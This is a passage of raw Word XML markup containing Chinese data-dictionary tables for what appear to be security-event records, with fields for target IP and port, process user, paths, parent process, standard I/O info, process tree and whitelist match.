          <w:p w14:paraId="23EA4A5F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>targetIp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E33DE6C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56E8D31D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CF7DF5E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>目标主机</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="66014EFA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="348B3081" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>targetPort</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AD08AB2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D65B399" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11A79B66" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>目标端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="20D6C79C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B3FAC21" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="34BB49A0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="10045E96" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12AD63B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="09D75BE7" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AB46FA1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>currentPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="272B6A07" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="478F4FA8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FEFB3F3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="1AB512E6" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25ED729A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>groupName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="215254F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E91509A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57CE26D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>用户所属组</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6362B86C" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2FA2C0A5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentPid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="11C55189" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59D5B535" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7695942F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="24BED5E2" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D49F00F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="788B4DB5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="133105ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5ABD2199" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="4CB20230" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="481FF6C6" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>parentPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0D4AE233" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t xml:space="preserve">String </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0CD470F5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>父进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4CFE23D8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="05306191" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="640ADAC7" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>stfInfo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F78015A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="09D8933E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5495782E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>标准I/O信息</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="5E3A0CC9" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2C1BBDE3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>processTree</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F506882" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0AC6222A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E195E0D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程树,按顺序为父进程至子进程</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="177394F1" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="740962CB" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>whiteRuleEffect</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="271FF58A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="101B8946" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>tinyint</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B6E099D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>是否匹配白名单</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4825B146" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProcessTree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>数据结构：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1632"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1430"/>
        <w:gridCol w:w="1838"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="71F5781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90EAE75" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7347AB26" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1F7DB92F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3535F49A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="44F09D45" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="710CAA0C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>userName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0DE48845" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="134C86ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79E0ECFD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动用户</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="56570A43" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DCE478A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>uid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D9B736A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5FA79421" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AEAA209" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程启动用户ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="7F6DB97A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="643181C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>pid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5A4BCC03" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="28DE7572" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="794C4E88" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6616594A" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F718A1D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ppid</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31CC39B3" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02CE6697" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>int(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43426B2C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>连接进程父进程ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="31420381" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="026C68B8" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>path</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13F9FF7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="78CB0B11" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>varchar(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>256)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="207485E9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>进程路径</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="35BA2F42" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4C8D26C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E14B179" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AE9565B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
